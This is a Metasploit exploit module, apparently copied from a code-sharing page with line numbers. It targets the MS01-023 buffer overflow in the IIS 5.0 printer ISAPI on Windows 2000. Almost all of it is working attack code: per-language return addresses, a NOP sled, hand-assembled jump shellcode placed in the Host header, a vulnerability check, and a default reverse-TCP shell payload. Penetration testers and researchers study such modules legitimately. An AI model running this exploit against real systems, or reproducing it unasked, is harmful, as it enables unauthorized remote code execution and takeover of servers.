Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'MS01-023 Microsoft IIS 5.0 Printer Host Header Overflow',
16
        'Description' => %q{
17
          This exploits a buffer overflow in the request processor of the
18
          Internet Printing Protocol ISAPI module in IIS. This module
19
          works against Windows 2000 Server and Professional SP0-SP1.
20

21
          If the service stops responding after a successful compromise,
22
          run the exploit a couple more times to completely kill the
23
          hung process.
24
        },
25
        'Author' => [ 'hdm' ],
26
        'License' => MSF_LICENSE,
27
        'References' => [
28
          [ 'CVE', '2001-0241'],
29
          [ 'OSVDB', '3323'],
30
          [ 'BID', '2674'],
31
          [ 'MSB', 'MS01-023'],
32
          [ 'URL', 'https://seclists.org/lists/bugtraq/2001/May/0005.html'],
33
        ],
34
        'Privileged' => false,
35
        'Payload' => {
36
          'Space' => 900,
37
          'BadChars' => "\x00\x0a\x0b\x0d\x20\x2f\x3a",
38
          'StackAdjustment' => -3500
39
        },
40
        'Targets' => [
41
          # jmp esp @ compfilt.dll
42
          [ 'Windows 2000 SP0-SP1 (Arabic)', { 'Ret' => 0x732345f3 } ],
43
          [ 'Windows 2000 SP0-SP1 (Czech)', { 'Ret' => 0x732645f3 } ],
44
          [ 'Windows 2000 SP0-SP1 (Chinese)', { 'Ret' => 0x732245f3 } ],
45
          [ 'Windows 2000 SP0-SP1 (Dutch)', { 'Ret' => 0x732745f3 } ],
46
          [ 'Windows 2000 SP0-SP1 (English)', { 'Ret' => 0x732c45f3 } ],
47
          [ 'Windows 2000 SP0-SP1 (French)', { 'Ret' => 0x732345f3 } ],
48
          [ 'Windows 2000 SP0-SP1 (Finnish)', { 'Ret' => 0x732945f3 } ],
49
          [ 'Windows 2000 SP0-SP1 (German)', { 'Ret' => 0x732345f3 } ],
50
          # [ 'Windows 2000 SP0-SP1 (Greek)', { 'Ret' => 0x732045f3 } ], # contains 0x20
51
          [ 'Windows 2000 SP0-SP1 (Korean)', { 'Ret' => 0x731e45f3 } ],
52
          [ 'Windows 2000 SP0-SP1 (Hungarian)', { 'Ret' => 0x732445f3 } ],
53
          [ 'Windows 2000 SP0-SP1 (Italian)', { 'Ret' => 0x732645f3 } ],
54
          [ 'Windows 2000 SP0-SP1 (Portuguese)', { 'Ret' => 0x732645f3 } ],
55
          [ 'Windows 2000 SP0-SP1 (Spanish)', { 'Ret' => 0x732645f3 } ],
56
          [ 'Windows 2000 SP0-SP1 (Swedish)', { 'Ret' => 0x732945f3 } ],
57
          [ 'Windows 2000 SP0-SP1 (Turkish)', { 'Ret' => 0x732545f3 } ],
58

59
          # jmp esp @ ws2_32.dll
60
          [ 'Windows 2000 Pro SP0 (Greek)', { 'Ret' => 0x74f862c3 } ],
61
          [ 'Windows 2000 Pro SP1 (Greek)', { 'Ret' => 0x74f85173 } ],
62
        ],
63
        'Arch' => [ARCH_X86],
64
        'Platform' => 'win',
65
        'DefaultOptions' => {
66
          'PAYLOAD' => 'windows/shell/reverse_tcp'
67
        },
68
        'Notes' => {
69
          'Reliability' => [REPEATABLE_SESSION],
70
          'Stability' => [CRASH_SERVICE_DOWN],
71
          'SideEffects' => [IOC_IN_LOGS]
72
        },
73
        'DefaultTarget' => 4,
74
        'DisclosureDate' => '2001-05-01'
75
      )
76
    )
77

78
    register_options([
79
      Opt::RPORT(80)
80
    ])
81
  end
82

83
  def check
84
    res = send_request_cgi({
85
      'uri' => '/NULL.printer',
86
      'version' => '1.0'
87
    })
88

89
    return CheckCode::Unknown('Connection failed') unless res
90
    return CheckCode::Safe unless res.code == 500
91
    # Error response is language dependent: "<b>Error in web printer install.</b>"
92
    return CheckCode::Safe unless res.body.to_s.starts_with?('<b>') && res.body.to_s.ends_with?('</b>')
93

94
    res = send_request_cgi({
95
      'uri' => '/NULL.printer',
96
      'vhost' => rand_text_alpha(257),
97
      'version' => '1.0'
98
    })
99

100
    return CheckCode::Unknown('Connection failed') unless res
101
    return CheckCode::Detected("The IUSER account is locked out, we can't check") if res.body.to_s.include?('locked out')
102
    return CheckCode::Safe unless res.code == 500
103
    return CheckCode::Safe unless res.body.to_s.starts_with?('<b>') && res.body.to_s.ends_with?('</b>')
104

105
    CheckCode::Appears
106
  end
107

108
  def exploit
109
    print_status("Using target: #{target.name} ...")
110

111
    buf = make_nops(268)
112
    buf << [target.ret].pack('V')
113
    buf << make_nops(8)
114

115
    # payload is at: [ebx + 96] + 256 + 64
116
    buf << "\x8b\x4b\x60"  # mov ecx, [ebx + 96]
117
    buf << "\x80\xc1\x40"  # add cl, 64
118
    buf << "\x80\xc5\x01"  # add ch, 1
119
    buf << "\xff\xe1"      # jmp ecx
120

121
    res = send_request_cgi({
122
      'uri' => "http://#{buf}/NULL.printer?#{payload.encoded}",
123
      'version' => '1.0'
124
    }, 5)
125

126
    # It is expected that we receive no reply. A reply indicates exploit failure.
127
    fail_with(Failure::UnexpectedReply, "#{res.code} #{res.message}") if res
128
  end
129
end
130

131